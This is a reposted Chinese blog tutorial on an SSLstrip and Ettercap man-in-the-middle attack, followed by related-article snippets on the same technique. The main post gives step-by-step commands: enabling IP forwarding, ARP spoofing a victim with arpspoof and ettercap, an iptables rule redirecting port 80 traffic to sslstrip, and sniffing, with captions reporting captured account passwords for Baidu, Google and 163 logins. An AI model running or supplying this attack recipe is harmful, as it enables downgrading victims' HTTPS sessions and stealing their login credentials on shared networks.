[转发]SSLstrip 中间人欺骗Https转Http获取密码

最新推荐文章于 2024-07-15 14:32:14 发布
最新推荐文章于 2024-07-15 14:32:14 发布
阅读量1.3k 收藏 4
点赞数

转自:http://www.2cto.com/Article/201305/215024.html


渗透回顾

SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

clip_image001

clip_image003

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2

clip_image005

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap –T –q –I eth0

clip_image007

clip_image009

登录http的百度 效果良好

监听到数据了

clip_image011

clip_image013

登录google

发现在https 卡顿 无法通过

clip_image014

开启sslstrip

clip_image016

clip_image018

再向google登录的时候 https变成http

clip_image020

成功登录

加载中...

监听到帐号密码

clip_image024

百度的

clip_image026

clip_image028

163的登录

clip_image030

http的跳转

clip_image032

网速过慢……

除了使用arpspoof 还可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的

yejinp
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sslstrip安装
qq_44881113的博客
08-22 1891
SSLStrip 攻击 SSLstrip 也叫 https 降级攻击,攻击者拦截用户流量后,欺骗用户与攻击者进行 http 通信,攻击者与服务器保持正常通信 (httphttps),从而获取用户信息。 攻击原理 通过中间人攻击监听 http 流量(自己试验可以通过设置 http 代理) 更改重定向链接中的 location,替换 httpshttp,并记录 更改响应内容中的超链接,替换 httpshttp,并记录 与用户进行 http 通信,与服务器进行 https 通信(记录中本应是 h
sslstrip-master.zip
03-17
SSLStrip是一款强大的网络安全工具,主要用于演示和检测中间人攻击(Man-in-the-Middle,MITM)中的SSL/TLS降级攻击。这个工具是由Moxie Marlinspike开发的,他在2009年的Black Hat安全会议上首次展示了这个工具。在...
SSLstrip0.9
10-11
著名的SSL中间人攻击工具SSLstrip最新版0.9版
SSLstrip 中间人欺骗HttpsHttp获取密码
weixin_34347651的博客
05-24 360
***回顾SSLstrip + EtterCap 中间人***实现https换成http获取帐号密码。Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据数据转发 echo 1 > /pro/sys/net/ipv4/ip_forward然后开启Ettercap的iptables 功能把注析去掉来个arp欺骗不使用...
SSLStrip-基于mitmproxy
最新发布
weixin_51031096的博客
07-15 688
拦截下的数据可摁enter进入详细页面,接着摁e进行修改,摁e弹出可修改的参数,选中参数后摁enter可进入修改界面,在第一行修改/添加值即可,之后摁esc再摁q返回之前的详细页面,之后摁a恢复请求,此时表示服务端已收到当前请求并对修改后的请求返回响应。此时摁方向键进入Response界面然后摁e以同样的方式修改数据,修改完成后 摁 ctrl + x 进行保存然后输入y 再摁 enter 进行退出,之后再摁 a 即可将请求发送给客户端。网卡> <靶机IP> <网关地址>
SSL剥离工具sslstrip
02-15 721
SSL剥离工具sslstrip 在日常上网过程中,用户只是在地址栏中输入网站域名,而不添加协议类型,如HTTPHTTPS。这时,浏览器会默认在域名之前添加http://,然后请求网站。如果网站采...
【流量劫持】SSLStrip 的未来 —— HTTPS 前端劫持
weixin_34413357的博客
10-14 452
前言 在之前介绍的流量劫持文章里,曾提到一种『HTTPS 向下降级』的方案 —— 将页面中的 HTTPS 超链接全都替换成 HTTP 版本,让用户始终以明文的形式进行通信。 看到这,也许大家都会想到一个经典的中间人攻击工具 —— SSLStrip,通过它确实能实现这个效果。 不过今天讲解的,则是完全不同的思路,一种更有效、更先进的解决方案 —— HTTPS 前端劫持。 后端的缺陷 在过去,流量劫...
第九课:综合应用之HTTPS账号密码获取.doc
09-06
2. **Sslstrip**:这是一个工具,主要用于中间人攻击(Man-in-the-Middle, MITM),它能够将HTTPS连接降级为HTTP,从而可以拦截并篡改数据,包括账号和密码Sslstrip的工作原理是替换链接中的“https”为“http”,...
sslstrip2:Leonardo Nve的原始SSLstrip +代码的镜像
05-09
SSLstrip + 这只是Leonardo Nve原始SSLstrip +代码的一面镜子,由于插销订单,该代码已被删除。 为此,您还需要一个DNS服务器来逆代理所做的更改,您可以在找到它。描述这是[Moxie的SSLstrip]( )的新版本,具有...
SSLstrip0.2分析与测试
02-20
总之,SSLstrip 作为一种针对 SSL 加密通信的嗅探工具,通过对 HTTPHTTPS 协议的巧妙利用实现了中间人攻击。了解其工作原理和技术细节,有助于我们更好地制定相应的防护策略,保障网络安全。
sslstrip 中间人HTTP
weixin_30361641的博客
04-25 95
https://moxie.org/software.html http://bbs.pediy.com/thread-173970.htm https://www.cnblogs.com/index-html/p/ssl-frontend-hijack.html http://www.cnblogs.com/BloodZero/p/4415483.html 载于:https://www....
SSLSTrip--Usage
weixin_34216036的博客
03-23 225
内容来自网络加上自己的一点编辑,Requirements:Python >= 2.5 (apt-get install python)The python "twisted-web" module (apt-get install python-twisted-web)Setup:tar zxvf sslstrip-0.9.tar.gzcd sslstrip-0.9(o...
https攻击工具详解(arp欺骗中间人攻击)(openssl+sslscan+sslsplit )
m0_48907714的博客
03-05 5134
https攻击工具详解(arp欺骗中间人攻击)(openssl+sslscan+sslsplit )
SSLStrip 终极版 —— location 劫持
swordheart的博客
04-25 1672
0x00 前言 之前介绍了HTTPS 前端劫持的方案,虽然很有趣,然而现实却并不理想。其唯一、也是最大的缺陷,就是无法阻止脚本跳。若是没有这个缺陷,那就非常完美了 —— 当然也就没有必要写这篇文章了。 说到底,还是因为无法重写location这个对象 —— 它是脚本跳的唯一渠道。尽管也流传一些 Hack 能勉强实现,但终究是不靠谱的。 事实上,在最近封稿的 HTML5 标准里,已非常明确了location的地位 —— Unforgeable。 这是个不幸的消息。不过也是件好事,让...
HTTPS如何防止DNS欺骗
weixin_33874713的博客
03-05 701
为什么80%的码农都做不了架构师?>>> ...
基于SSLStripHTTPS会话劫持
realmeh的专栏
12-29 2275
0 引言 HTTPS作为一种安全的HTTP数据传输协议,被广泛应用于万维网上敏感信息的通信,例如交易支付等方面。然而,HTTPS也存在自身的缺陷,不能绝对保证服务端自身的安全。在网络攻防中,威胁服务器安全的行为时有发生,最常见的例子就是使用模仿银行域名的钓鱼攻击(Phishing)。随着HTTPS的广泛使用,一些新的针对HTTPS会话的劫持也开始出现,如基于中间人攻击的Surf Jacking、
免费WiFi,wireshark抓包及sslstrip密码
weixin_34400525的博客
06-17 435
因写了一段文字,就有这个抓包实验--------------------------------话说:“现在我们一到某处,第一件事便是问有没有WiFi”。WiFi成为当下的热门,在公共场合人们最喜欢免费WiFi。但用着用着后不觉QQ被盗了。这WiFi便是诱饵,钓鱼人设了一个局,我们以为捡到便宜了,须不知,我们上勾了。QQ被盗,邮箱被浏览等等。免费虽好,请谨慎。----...
SSLStrip 的未来 —— HTTPS 前端劫持
cnbird's blog
10-18 1434
http://www.cnblogs.com/index-html/p/ssl-frontend-hijack.html
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值